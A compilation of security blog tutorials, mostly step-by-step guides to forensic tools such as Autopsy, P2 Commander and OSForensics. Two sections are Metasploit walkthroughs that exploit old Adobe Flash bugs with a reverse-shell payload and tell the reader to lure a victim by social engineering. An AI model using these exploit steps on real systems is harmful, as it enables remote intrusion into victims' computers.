
Forensic Investigation of victim pc using Autopsy


Autopsy® is a digital forensics platform and graphical interface to The Sleuth Kit® and other digital forensics tools. It can be used by law enforcement, military, and corporate examiners to investigate what exactly happened on a computer. You can even use it to recover photos from your camera’s memory card for case investigation.

Autopsy features:

  • Timeline Analysis: Displays system events in a graphical interface to help identify activity.
  • Keyword Search: Text extraction and indexed search modules enable you to find files that mention specific terms and match regular expression patterns.
  • Web Artifacts: Extracts web activity from common browsers to help identify user activity.
  • Registry Analysis: Uses RegRipper to identify recently accessed documents and USB devices.
  • LNK File Analysis: Identifies shortcuts and accessed documents.
  • Email Analysis: Parses MBOX format messages, such as Thunderbird.
  • EXIF: Extracts geolocation and camera information from JPEG files.
  • File Type Sorting: Groups files by their type to find all images or documents.
  • Media Playback: View videos and images in the application without requiring an external viewer.
  • Thumbnail Viewer: Displays thumbnails of images for quick viewing of pictures.
  • Robust File System Analysis: Support for common file systems, including NTFS, FAT12, FAT16, FAT32, HFS+, ISO9660 (CD-ROM), Ext2, Ext3, and UFS, from The Sleuth Kit.
  • Hash Set Filtering: Filter out known good files using NSRL and flag known bad files using custom hash sets in HashKeeper, md5sum, and EnCase formats.
  • Tags: Tag files with arbitrary tag names, such as ‘bookmark’ or ‘suspicious’, and add comments.
  • Unicode Strings Extraction: Extracts strings from unallocated space and unknown file types in many languages (Arabic, Chinese, Japanese, etc.).
  • File Type Detection: Based on file signatures, with extension mismatch detection.
  • Interesting Files Module: Flags files and folders based on name and path.
  • Android Support: Extracts data from SMS, call logs, contacts, Tango, Words with Friends, and more.
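As an added example (not Autopsy's own code), the following Python script reproduces what the Hash Set Filtering and File Type Detection modules do: it hashes each file, drops NSRL-style known-good hits, flags known-bad hits as notable, and reports files whose leading bytes do not match their extension. The hash sets, signature table and evidence tree are constructed sample data.

```python
"""Hash-set filtering and extension-mismatch detection, as Autopsy does it."""
import hashlib
import os
import tempfile

# Magic-byte signatures. Assumption: a small subset of the table a real
# file-type module carries; enough to show the technique.
SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"%PDF-": "pdf",
    b"PK\x03\x04": "zip",
    b"MZ": "exe",
}
# Extensions that legitimately carry each signature.
EXPECTED_EXT = {
    "png": {"png"},
    "jpg": {"jpg", "jpeg"},
    "pdf": {"pdf"},
    "zip": {"zip", "jar", "apk", "docx", "xlsx", "pptx"},
    "exe": {"exe", "dll", "sys", "scr"},
}


def hash_file(path, chunk_size=1 << 20):
    """Return (md5, sha1, sha256) hex digests, streaming the file in chunks."""
    md5, sha1, sha256 = hashlib.md5(), hashlib.sha1(), hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            md5.update(chunk)
            sha1.update(chunk)
            sha256.update(chunk)
    return md5.hexdigest(), sha1.hexdigest(), sha256.hexdigest()


def detect_type(path):
    """Identify a file by its leading bytes; None when no signature matches."""
    with open(path, "rb") as fh:
        head = fh.read(16)
    for magic, kind in SIGNATURES.items():
        if head.startswith(magic):
            return kind
    return None


def classify(path, known_good, known_bad):
    """Classify one file. known_good / known_bad are sets of lowercase MD5
    hex digests (NSRL-style sets list MD5 and SHA-1; MD5 is used here).
    A known-bad hit wins over known-good if a hash is somehow in both."""
    md5, _sha1, sha256 = hash_file(path)
    if md5 in known_bad:
        verdict = "notable"   # Autopsy's term for a known-bad hit
    elif md5 in known_good:
        verdict = "known"     # NSRL known-good: safe to filter out
    else:
        verdict = "unknown"
    kind = detect_type(path)
    ext = os.path.splitext(path)[1].lstrip(".").lower()
    mismatch = kind is not None and ext not in EXPECTED_EXT[kind]
    return {"path": path, "md5": md5, "sha256": sha256, "verdict": verdict,
            "type": kind, "ext": ext, "mismatch": mismatch}


def triage(root, known_good, known_bad):
    """Walk a tree and keep only what deserves an examiner's attention:
    known-bad hits and extension mismatches. Known-good files drop out."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            rec = classify(os.path.join(dirpath, name), known_good, known_bad)
            if rec["verdict"] == "notable" or rec["mismatch"]:
                findings.append(rec)
    return findings


def demo():
    """Constructed evidence tree: returns {file name: (verdict, mismatch)}
    for every file the triage reports."""
    root = tempfile.mkdtemp(prefix="evidence_")
    pe_stub = b"MZ\x90\x00" + b"\x00" * 60        # constructed PE-like header
    samples = {
        "readme.txt": b"hello",                    # in the known-good set
        "photo.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 32,  # jpg, honest extension
        "invoice.pdf": pe_stub,                    # executable disguised as PDF
        "tool.exe": pe_stub,                       # same bytes, honest extension
    }
    for name, data in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(data)
    known_good = {hashlib.md5(samples["readme.txt"]).hexdigest()}
    known_bad = {hashlib.md5(pe_stub).hexdigest()}
    return {os.path.basename(r["path"]): (r["verdict"], r["mismatch"])
            for r in triage(root, known_good, known_bad)}
```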

First, download Autopsy from here and install it on your PC.

Click New Case. The ‘Create a New Case’ page will open. You can also use a device clone that was created earlier (click here to view how).

Fill in the ‘Case Name’ and ‘Base Directory’ and choose the location to save the report, e.g. c:\users\raj\desktop\autopsy report.

Then click Next to proceed to the next step.

In the next step, enter the case number and examiner details and click Finish to proceed.

Now, in Add Data Source, you have to complete three steps.

In step 1, Enter Data Source Information, select the local disk, the location of the local disk, and the time zone for your location, then click Next to proceed to step 2.

In step 2, Configure Ingest Modules, I chose all the modules, since I want complete information on the evidence device (disk, computer, etc.). Click Next for step 3.

In step 3, Add Data Source, just click Finish to generate the report for the device; you can then perform a complete investigation of the victim device, PC, or any disk.

Here you can see the user’s local disk; we can analyze it completely from here without accessing the actual data on the local disk. You can see Data Sources, Views, Results, Email Messages, Interesting Items, etc.

Finally, when you choose Data Sources and select the drive we chose, the details shown in the image appear: all the files and folders on the local disk, along with their modified time, change time, access time, etc.

With these you can investigate user details on the local disk, as well as find out which files were deleted from the disk, with their date and time and related information.

Author: Abdul Salam is a cyber security researcher and corporate trainer at Ignite Technologies. He has 2+ years of experience in cyber security.

The post Forensic Investigation of victim pc using Autopsy appeared first on Hacking Articles.


Learn How to Hack an App Video Series


Do you know how to hack an app? Do you want to learn? All it takes is a few readily available tools and a matter of minutes for today’s hackers to successfully exploit a mobile application. To see how it’s done, watch these short clips below as Jonathan Carter from Arxan Technologies demonstrates just how easy it is for hackers to perform mobile attack vectors.

iTunes Code Encryption Bypass

Android APK Reverse Engineering

Algorithm Decompilation and Analysis

Baksmali Code Modification

Reverse Engineering String Analysis

Swizzle with Code Substitution

Understanding application internal structures and methods via Class Dumps

For more information on how to address these threats and harden the security of your own app, visit Arxan’s application protection page.


How to Create Forensics Image of PC using R-Drive Image


R-Drive Image is a powerful utility for creating disk image files for backup or duplication purposes. A disk image file contains an exact, byte-by-byte copy of a hard drive, partition or logical disk and can be created with various compression levels on the fly, without stopping the Windows OS and therefore without interrupting your business. These drive image files can then be stored in a variety of places, including removable media such as CD-R(W)/DVD, Iomega Zip or Jaz disks, etc.

R-Drive Image Features

A simple wizard interface: no in-depth computer management skills are required.

On-the-fly actions: Image files are created on the fly, with no need to stop and restart Windows. All other disk writes are stored in a cache until the image is created. Data from image files is restored on the fly as well, except on a system partition. Data to the system partition can be restored either by restarting R-Drive Image in its pseudo-graphic mode directly from Windows, or by using specially created startup disks.

Image file compression: Image files can be compressed to save storage space.

Removable media support: Image files can be stored on removable media.

Startup version: A startup version can be used to image, restore, or copy partitions locked by the OS. The computer can be restarted into the startup version either directly from Windows, or from an external USB device, a CD/DVD disk, or 6 floppies. The startup version can use either a graphical user interface or a pseudo-graphic mode if the graphics card is not supported. UEFI boot is supported for modern computers.

USB 2.0 and 3.0 support in the startup version: With hard drive prices constantly going down, an external IDE-USB 2.0 or 3.0 HDD case with an appropriate hard drive is an ideal (fast and reliable) solution for storing backup files for the system and other partitions that can be restored only in the startup version. There is no more need for numerous unreliable CDs and slow CD/DVD recorders. Remember: with incremental backups, this hard drive does not need to be very large.

Network support in the startup version: The R-Drive Image startup version supports disk image file creation and restoration over the Microsoft network (CIFS protocol).

Extended list of supported devices in the startup version: The list of hardware supported by the R-Drive Image startup version has been extended.

Image files as virtual disks: An image file can be connected as a read-only virtual disk. Such a disk can be browsed, and files and folders can be found and copied.

Individual file and folder restoration: Individual files and folders, rather than an entire disk, can be restored either during the restore action or from an image file connected as a virtual disk.

Image file splitting: Drive images can be split into several files to fit a storage medium.

Image protection: Disk image files can be password-protected and contain comments.

New partition creation: Data from a disk image can be restored to free (unpartitioned) space anywhere on a hard drive. The size of the restored partition can be changed.

Partition replacement: Data from a disk image can be restored onto other existing partitions. R-Drive Image deletes such partitions and restores data onto that free space.

Disk-to-disk copy: An entire disk can be directly copied onto another one.

Image file verification: You may check whether your image files are good before you store them or restore data from them.

Scheduler: A time for disk image creation may be scheduled, and the process can be run in unattended mode.

Script creation for frequent or unattended actions: Scripts for creating an image file and appending data to an existing image file are created from the R-Drive Image interface the same way the actual action is performed. Scripts are executed from the command line, and such commands can be included in any command file.

Action report: When a disk image is successfully created or the action fails, a report can be automatically sent by e-mail, or an external application can be launched.

Support for the ReFS file system (Resilient File System), a new local file system Microsoft introduced in Windows Server 2012. All disk actions are supported, except partition resizing.

Full support for the GPT partitioning layout: R-Drive Image can create GPT disks, resize them, and change their partition layout during copy/restore operations.

Support for Windows Storage Spaces (Windows 8/8.1 and 10), Linux Logical Volume Manager volumes, and Mac RAIDs.

First, download R-Drive Image from here and install it on your PC.

Now open R-Drive Image and click Create an Image.

Select the drive whose image you want to create, then click Next.

You may select all objects on a hard drive by clicking the hard drive icon. It will show the marked hard drive.

Select the place on the Image Destination panel where the image files will be written, specify the file name, and click the Next button.

If you try to append data to a password-protected image file, the Password prompt message will appear. Enter the password and click Next.

Click Next.

Verify that the information on the Processing panel is correct and click the Start button.

How to Restore Backup

Click Restore from an Image on the Action Selection panel.

Select the file with the image on the Image File Selection panel and click the Next button.

Select the object in the image file on the Image Object Selection panel, select a destination, and click the Next button.

Now click Next.

Click Start; the restore process will begin and the drive will be restored on your PC.

Author: Mukul Mohan is a certified MCSE and MCSA. He is an experienced corporate trainer with 20+ years of experience, now working with Ignite Technologies as a corporate trainer. If you are interested in Microsoft Server 2008 or Advanced Excel, you can contact him at mukul@ignitetechnologies.in.


Hack Remote Windows PC using Adobe Flash Player NetConnection Type Confusion


This module exploits a type confusion vulnerability in the NetConnection class of Adobe Flash Player. With the correct memory layout, this vulnerability allows corrupting arbitrary memory. It can be used to overwrite dangerous objects, like vectors, and finally accomplish remote code execution. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE 11 with Flash 16.0.0.305.

Exploit Targets

Flash 16.0.0.305

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole.

Now type use exploit/windows/browser/adobe_flash_net_connection_confusion

msf exploit (adobe_flash_net_connection_confusion)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_net_connection_confusion)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_net_connection_confusion)>set srvhost 192.168.1.7

msf exploit (adobe_flash_net_connection_confusion)>set uripath /

msf exploit (adobe_flash_net_connection_confusion)>exploit

Now you have a URL to give to your victim: http://192.168.1.7:8080

Send the link of the server to the victim via chat, email, or any social engineering technique.

When the victim opens the link (http://192.168.1.7:8080), a session will be opened as shown below.

Now type sessions -l to display the sessions opened when the victim opened the link.

Once the session has opened, type sysinfo to get system information, then type shell to enter the victim’s command prompt.


Hack Remote Windows PC using Adobe Flash Player domainMemory ByteArray Use After Free


This module exploits a use-after-free vulnerability in Adobe Flash Player. The vulnerability occurs when the ByteArray assigned to the current ApplicationDomain is freed from an ActionScript worker by forcing a reallocation (copying more contents than the original capacity); Flash forgets to update the domainMemory pointer, leading to a use-after-free when the main worker references domainMemory again. This module has been tested successfully on Windows 7 SP1 (32-bit), IE 8 and IE 11 with Flash 17.0.0.134.

Exploit Targets

Flash 17.0.0.134

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open a Kali terminal and type msfconsole.

Now type use exploit/windows/browser/adobe_flash_domain_memory_uaf

msf exploit (adobe_flash_domain_memory_uaf)>set payload windows/meterpreter/reverse_tcp

msf exploit (adobe_flash_domain_memory_uaf)>set lhost 192.168.1.7 (IP of Local Host)

msf exploit (adobe_flash_domain_memory_uaf)>set srvhost 192.168.1.7

msf exploit (adobe_flash_domain_memory_uaf)>set uripath /

msf exploit (adobe_flash_domain_memory_uaf)>exploit  

Now you have a URL to give to your victim: http://192.168.1.7:8080

Send the link of the server to the victim via chat, email, or any social engineering technique.

When the victim opens the link (http://192.168.1.7:8080), a session will be opened as shown below.

Now type sessions -l to display the sessions opened when the victim opened the link.

Once the session has opened, type sysinfo to get system information, then type shell to enter the victim’s command prompt.


How to Collect Forensics Evidence of PC using P2 Commander (Part 1)


P2C is a comprehensive digital investigation tool with over ten years of court-approved use by forensic examiners. An integrated database and true multi-threading mean faster processing. P2C was built on Paraben’s trusted email examination tools for unparalleled network email and personal email archive analysis. Advanced features include Data Triage analysis, Xbox analysis, and pornography detection.

First, download P2 Commander from here, install it on the victim PC, and open P2 Commander. Click New Case; the ‘Create a New Case’ page will open.

Then click Next to proceed to the next step.

In the next step, enter the case name (Demo in this case) and its details, and click Finish to proceed to the next step.

In the next step, enter the investigator name and email details, and click Finish to proceed to the next step.

Now click ‘Add Evidence’ -> choose ‘Image File’.

Now select the Auto-detect Image option from the source type, which will add the image evidence in any format. You can also choose from the other available options, such as Drive Image or FAT Partition Image.

Now load the evidence disk image.

To learn how to create a disk image, read this article:

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

After selecting the evidence image, click Open.

Now you will see that the case Demo has been created, showing the directory hierarchy of the evidence image.

Now you can click on any one of the directories of the evidence image and it will show you all the files and sub-folders within that folder, describing their file name, file type, file size, creation time, last modification, etc.

Now click on the Generate Report tab.

Select the report type to be generated. In my case I am selecting HTML Investigative Report, and select the destination folder. Then click Next.

Now select the sorted files to be added by clicking the Add and Export button with their file types. Then click Next to proceed.

Now click Finish to proceed to the next step.

The report file will be saved in your destination folder. Now you can view the details of your report.

Author: Mukul Mohan is a Microsoft Certified Systems Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years of technical training experience. You can contact him at mukul@ignitetechnologies.in.



How to study Forensics Evidence of PC using P2 Commander (Part 2)


Now we will study the forensic evidence which we collected in the previous article.

If you want to see how the forensic evidence was collected, click the link below.

http://www.hackingarticles.in/how-to-collect-forensics-evidence-of-pc-using-p2-commander-part-1/

First of all, we will look into the Trash folder (which contains the files and folders deleted by the user but not yet permanently erased from the system).

Clicking on the Trash folder shows us the different files and folders with their Creation Time, Last Access Time, Last Change Time, and File Size.

Now click on Advanced Registry and System Analyzer and then on the Auto Run option.

Go to the Run option. It will show all the programs that run automatically when the system boots.

Now select the OS Info option. Through OS Info, we can see the Root Path, Current Version, Registered User, Product ID, Edition ID, and Installation Type.

Now select the Uninstall option under Programs. Through the Uninstall option, we can see all the programs installed on the system.

To see the running services on the system, select the Services option.

Now click on Known DLLs to see the dynamic link libraries (which contain data and code used by different programs simultaneously).

Now, to get information about the removable disks used recently or in the past, first click on USB Storage and then select USBSTOR. It will show the names of the disks.

Now select any one of the disks and it will show us its size as well as the manufacturer name.

To see the history of the most recently used commands from the Run command on the Start menu, click on the Users Info option. Select a user; in my case we are selecting Raj. Now click on RunMRU.

To see user-based web activity, click on TypedURLs, which will show the recently visited web sites.

Author: Mukul Mohan is a Microsoft Certified Systems Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years of technical training experience. You can contact him at mukul@ignitetechnologies.in.


How to gather Forensics Investigation Evidence using ProDiscover Basic


The ARC Group ProDiscover® Basic edition is a self-managed tool for the examination of your hard disk security. ProDiscover Basic is designed to operate under the National Institute of Standards’ Disk Imaging Tool Specification 3.1.6 to collect snapshots of activities that are critical to taking proactive steps in protecting your data.

ProDiscover Basic has a built-in reporting tool to present findings as evidence for legal proceedings. You gather time zone data, drive information, Internet activity, and more, piece by piece, or in a full report as needed. You have robust search capabilities for capturing unique data, filenames and filetypes, data patterns, date ranges, etc. ProDiscover Basic gives clients the autonomy they desire in managing their own data security.

At the ARC Group, we provide the tools you need to identify security issues before they escalate, and we use ProDiscover solutions to maintain your corporate safety and preserve your data. With ProDiscover Basic, professional consultants, system administrators, and investigators take the upper hand to manage cyber security at every level and protect information in the case of impending legal actions.

First, download ProDiscover Basic from here and install it on your PC. Enter the Project Number, Project File Name and Description in ProDiscover Basic, then click Open.

In the main window, click Capture & Add Image.

Now select the source drive that we want to capture; this could be a USB drive or a physical drive. In my case I select Physical Drive 1, which is my USB drive.

Now set the destination where we want to store the image file. In my case I used the E: drive, named the image folder pd, and named the image to be saved in that folder PD.EVE.

Now enter the ‘Technician Name’, ‘Image Number’ and ‘Description’, then click OK.

After finishing the above steps, the following window will appear.

After imaging the drive, close the ProDiscover program; it will then ask you to save your project.

Now start ProDiscover again, click Open Project, browse to your project image, select it and click Open.

Now the project will open. Go to the left menu and click on Content View. It will show you all the contents of the evidence image.

To generate the automatic report, click on the Report tab under the View menu. It will show you the Evidence Report.

Author: Mukul Mohan is a Microsoft Certified Systems Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years of experience. You can contact him at mukul@ignitetechnologies.in.


How to Convert Encase, FTK, DD, RAW, VMWare and other image file as Windows Drive


Mount Image Pro mounts EnCase, FTK, DD, RAW, SMART, SafeBack, ISO, VMWare and other image files as a drive letter (or physical drive) on your computer.

Features of Mount Image Pro

It enables the mounting of forensic images including:

  • EnCase .E01, .EX01, .L01, .LX01
  • AccessData .AD1
  • DD and RAW images (Unix/Linux)
  • Forensic File Format .AFF
  • NUIX .MFS01
  • ProDiscover
  • Safeback v2
  • SMART
  • XWays .CTR

And other common image formats including:

  • Apple DMG
  • ISO (CD and DVD images)
  • Microsoft VHD
  • VMWare

These image files are mounted as a drive letter under the Windows file system.

IMPORTANT: When dealing with forensic evidence files, ensure that you have a verified and secured master copy.

First of all, we click on My Computer; it shows us all physical drives and removable storage drives.

Now download Mount Image Pro from here, install it on your PC, then open Mount Image Pro and click the Mount button.

It will open the selection window. To add an image file to the selection window, click the Add Image option and add the evidence raw image.

Now load the evidence disk image.

To learn how to create a disk image, read this article:

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

After selecting the evidence image, click Open.

Now the evidence image is selected; click Mount Disk.

The Options window will open. Click OK.

Now it will show the mounted image.

Now click on My Computer. It will show you the mounted image as a drive.

Note: This tool can also be used to mount a VMware image as a drive.

Author: Mukul Mohan is a Microsoft Certified Systems Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years of experience. You can contact him at mukul@ignitetechnologies.in.


How to Mount Forensics image as a Drive using P2 eXplorer Pro


P2 eXplorer Pro is a specialized component of P2C that allows you to virtually mount forensic images such as raw DD, E01, and even virtual machine images as local drive letters. It is free with any purchase of P2C.

P2 eXplorer Pro can mount the following image formats: EnCase (E01), Forensic Replicator (PFR), SafeBack 1, 2, & 3, SMART, FTK DD & E01, Raw DD, WinImage, Paraben’s Forensic Containers (P2S), VMware, VirtualPC, & VirtualBox (VDI).

First of all, we click on My Computer; it shows us all physical drives and removable storage drives.

Now download P2 eXplorer from here, install it on your PC, then open P2 eXplorer and click the Mount Storage button.

Now load the evidence disk image by clicking the Browse option.

To learn how to create a disk image, read this article:

http://www.hackingarticles.in/how-to-create-copy-of-suspects-evidence-using-ftk-imager/

Now it will show the mounted image.

Now click on My Computer. It will show you the mounted image as a drive.

Author: Mukul Mohan is a Microsoft Certified Systems Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years of experience. You can contact him at mukul@ignitetechnologies.in.


How to Create and Convert RAW Image in Encase and AFF Format using Forensics Imager


Forensic Imager is a Windows based program that will acquire, convert, or verify a forensic image in one of the following common forensic file formats:

  • DD /RAW (Linux “Disk Dump”)
  • AFF (Advanced Forensic Format)
  • E01 (Encase®)

Program Functions

Forensic Imager provides three separate functions:

  • Acquire: The acquire option is used to take a forensic image (an exact copy) of the target media into an image file on the investigator’s workstation;
  • Convert: The convert option is used to copy an existing image file from one image format to another, e.g. DD to E01;
  • Hash or verify: The hash or verify option is used to calculate a hash value, MD5, SHA1 or SHA256, for a device or an existing image file.

It also includes the option to SHA256 sector-hash a device so that known sectors can be located within an image file (e.g. a single sector of a JPEG file left in unallocated clusters can be identified by its sector hash).
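As an added example (not Forensic Imager's code), this Python block shows the sector-hash technique the paragraph describes: a SHA-256 set over every 512-byte sector of a known file, then a scan of a raw image to find which sectors of that file survive, even when only a fragment remains. The known file and the image are constructed, and single-byte-fill sectors (all zeros, for instance) are skipped because they would match everywhere on a disk.

```python
"""SHA-256 sector hashing: locate sectors of a known file inside a raw image."""
import hashlib
import random

SECTOR = 512  # sector size the index and the scan both use


def sectors(data, sector=SECTOR):
    """Yield (index, sector_bytes); a trailing partial sector is zero-padded,
    which matches how the last sector of a file sits on disk."""
    for i in range(0, len(data), sector):
        yield i // sector, data[i:i + sector].ljust(sector, b"\x00")


def is_low_entropy(chunk):
    """All-zero or single-byte-fill sectors occur all over a disk; indexing
    them would turn every wiped or unused sector into a 'hit'."""
    return len(set(chunk)) <= 1


def build_index(known_file):
    """Return {sha256_hex: sector_index_in_file} for the known file."""
    index = {}
    for idx, chunk in sectors(known_file):
        if not is_low_entropy(chunk):
            index[hashlib.sha256(chunk).hexdigest()] = idx
    return index


def locate(image, index):
    """Scan the image sector by sector; return (image_sector, file_sector)
    pairs for every sector whose hash is in the index."""
    hits = []
    for idx, chunk in sectors(image):
        digest = hashlib.sha256(chunk).hexdigest()
        if digest in index:
            hits.append((idx, index[digest]))
    return hits


def demo():
    """Constructed scenario: a 3-sector 'JPEG' whose first two sectors survive
    in unallocated space of a 16-sector image; the third was overwritten."""
    rng = random.Random(7)

    def rand(n):
        return bytes(rng.getrandbits(8) for _ in range(n))

    known = b"\xff\xd8\xff\xe0" + rand(SECTOR * 3 - 4)   # constructed known file
    index = build_index(known)
    image = bytearray(rand(SECTOR * 16))                 # unrelated filler
    image[5 * SECTOR:7 * SECTOR] = known[:2 * SECTOR]    # surviving fragment
    image[10 * SECTOR:11 * SECTOR] = b"\x00" * SECTOR    # a wiped sector
    return locate(bytes(image), index)
```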

First, download Forensic Imager from here, install it on your PC, then open Forensic Imager and click the Acquire option.

It will show you all drives. Select the drive whose image is to be created. Click Next.

Now select the image type from the drop-down menu, select the output file name in the Folder option where you want to save your evidence image, fill in details such as Case Name, Evidence Number, Examiner, etc., and click Start.

Now it will show you the Acquisition Progress. After completion, it will create a raw image in the specified folder.

Now we will proceed to convert the RAW file into EnCase format.

Open Forensic Imager again, click Add Image and select the image to be converted. Then click Next.

Now select the image type from the drop-down menu (the format you want to convert to) and select the output file in the Folder option where you want to save your raw image in EnCase format. Click Start.

Now it will show the Conversion Progress, and after completion an EnCase-format file will be created in the specified folder.

Author: Mukul Mohan is a Microsoft Certified Systems Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years of experience. You can contact him at mukul@ignitetechnologies.in.


Forensics Investigation of Evidence RAW Image using OS Forensics Tool


OS Forensics allows you to identify suspicious files and activity with hash matching, drive signature comparisons, e-mails, memory and binary data.

It lets you extract forensic evidence from computers quickly with advanced file searching and indexing and enables this data to be managed effectively.

Features

  • Discover Forensic Evidence Faster
  • Find files faster; search by filename, size and time
  • Search within file contents using the Zoom search engine
  • Search through email archives from Outlook, Thunderbird, Mozilla and more
  • Recover and search deleted files
  • Uncover recent activity: website visits, downloads and logins
  • Collect detailed system information
  • Password recovery from web browsers, decryption of Office documents
  • Discover and reveal hidden areas in your hard disk
  • Browse Volume Shadow Copies to see past versions of files
  • Identify Suspicious Files and Activity
  • Verify and match files with MD5, SHA-1 and SHA-256 hashes
  • Find misnamed files where the contents don’t match their extension
  • Create and compare drive signatures to identify differences
  • Timeline viewer provides a visual representation of system activity over time
  • File viewer that can display streams, hex, text, images and metadata
  • Email viewer that can display messages directly from the archive
  • Registry viewer to allow easy access to Windows registry hive files
  • File system browser for Explorer-like navigation of supported file systems on physical drives, volumes and images
  • Raw disk viewer to navigate and search through the raw disk bytes on physical drives, volumes and images
  • Web browser to browse and capture online content for offline evidence management
  • ThumbCache viewer to browse the Windows thumbnail cache database for evidence of images/files that may have once been on the system
  • SQLite database browser to view and analyze the contents of SQLite database files
  • ESEDB viewer to view and analyze the contents of ESE DB (.edb) database files, a common storage format used by various Microsoft applications
  • Prefetch viewer to identify the time and frequency of applications that have been run on the system, and thus recorded by the OS’s Prefetcher

First Download OS Forensic  from here and install in your pc then open OS Forensic and click on create  case  button to  create a new forensic case.

Now enter the details such as Case Name, Investigator Name, Default Drive, and Acquisition Type.

To specify the case folder, click on browse & select the Location where you want to save your Evidence Report.

Now it will show us the registered case in this tool. Now to manage this case, click on Add Device option available in Manage Current Case.

Now select Image File option in Select Device to add option. Now assign the path of the folder where image file exists and also give the Display Name which is compulsory. Click on OK Button.

The details of the image file are now shown.

To search for files by type, click File Name Search, browse to the forensic image in Start Folder, and use the Preset pop-up menu to pick a file type such as images, audio or video. The matching files are listed.

To reconstruct what the user did most recently, click Recent Activity, choose Scan Drive and then click Scan.

To find files the user deleted, click Deleted File Search, select the forensic image and click Search. All recoverable deleted files in the image are listed. The remaining options of this tool are covered in a forthcoming article.
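The misnamed-file check from the feature list above, as an added example (not OSForensics code): it reads each file's first bytes, matches them against a small constructed signature table, and flags files whose extension does not belong to the detected type. Files with an unknown signature are left alone rather than reported, so the output is a list of definite mismatches. The signature table is an assumption for illustration; a real scan would draw on a full signature database.

```python
"""Extension-mismatch check: compare each file's leading bytes against a
signature table and flag files whose name says one thing and content another.
Added example; not OSForensics code. The signature table is a small constructed
subset, not an exhaustive list."""
import os
import tempfile

# (magic prefix, extensions that legitimately carry it): constructed subset
SIGNATURES = [
    (b"\xff\xd8\xff", {".jpg", ".jpeg"}),
    (b"\x89PNG\r\n\x1a\n", {".png"}),
    (b"%PDF-", {".pdf"}),
    (b"PK\x03\x04", {".zip", ".docx", ".xlsx", ".pptx", ".jar", ".apk"}),
    (b"MZ", {".exe", ".dll", ".sys", ".scr"}),
    (b"\x7fELF", {".so", ""}),   # ELF binaries usually carry no extension
]


def detect_type(header: bytes):
    """Return the extension set whose magic matches the leading bytes, else None."""
    for magic, exts in SIGNATURES:
        if header.startswith(magic):
            return exts
    return None


def check_file(path: str):
    """Return (extension, matching extension set or None, mismatch flag)."""
    with open(path, "rb") as fh:
        header = fh.read(16)
    ext = os.path.splitext(path)[1].lower()
    exts = detect_type(header)
    # Unknown signatures are not mismatches: only what we can identify is flagged.
    return ext, exts, exts is not None and ext not in exts


def find_mismatches(root: str):
    """Walk a tree; return sorted (relative path, extension, expected extensions)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            ext, exts, mismatch = check_file(full)
            if mismatch:
                found.append((os.path.relpath(full, root), ext, sorted(exts)))
    return sorted(found)


def demo():
    """Scan a constructed sample tree; returns the mismatches found."""
    samples = {
        "holiday.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 20,  # genuine JPEG
        "report.pdf": b"MZ\x90\x00" + b"\x00" * 60,         # PE binary renamed .pdf
        "notes.txt": b"just text\n",                        # no known magic: ignored
        "setup.exe": b"MZ\x90\x00" + b"\x00" * 60,          # genuine PE
        "photo.png": b"PK\x03\x04" + b"\x00" * 20,          # ZIP container renamed .png
    }
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(data)
        return find_mismatches(root)


if __name__ == "__main__":
    for rel, ext, expected in demo():
        print(f"{rel}: named {ext!r} but content matches {expected}")
```

Run it against a mounted evidence volume by calling find_mismatches on the mount point; a PE file hiding behind .pdf or a ZIP behind .png shows up immediately, which is exactly the kind of renaming used to smuggle data or tooling past a casual look at file names.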

Author: Mukul Mohan is a Microsoft Certified System Engineer in Security and Messaging. He is a Microsoft Certified Technology Specialist with a high level of expertise in handling server-side operations on the Windows platform, and an experienced IT technical trainer with over 20 years' experience. You can contact him at mukul@ignitetechnologies.in

The post Forensics Investigation of Evidence RAW Image using OS Forensics Tool appeared first on Hacking Articles.

How to identify any Suspicious changes to files or directory (Disk Drive Signature)


By OSForensics

Creating a signature generates a snapshot of the directory structure of the drive at the point of creation. This information includes data about a file’s directory path, file size and file attributes.

How to Create a Signature

First of all, download OSForensics from here.

Select the Create Signature option and click Config.

Now browse to the desired directory under Directory list management; in this example it is the H: drive, a USB pen drive. Click Add to list to include the directory, then click OK.

The Start Folder field now shows the selected drive (H:). Click Start.

You are asked for a file name; enter one and click Save. The signature for the data drive is created.

Now make some modifications on the data drive and repeat the same steps to create a second signature after the changes.

Now click the Compare Signature option.

Browse to the two signature files, the first as Old Signature and the second as New Signature.

Click Compare to start the comparison. The result lists each file with its modification status and its creation and modification dates. Use the Show option to restrict the list to modified or deleted files only.

Clicking a modified file shows the differences in detail: its path in the old and new signature, and its creation and modification dates. Note that a signature built from path, size and attributes alone will not detect a content change that preserves size and timestamps; where that matters, compare file hashes as well.
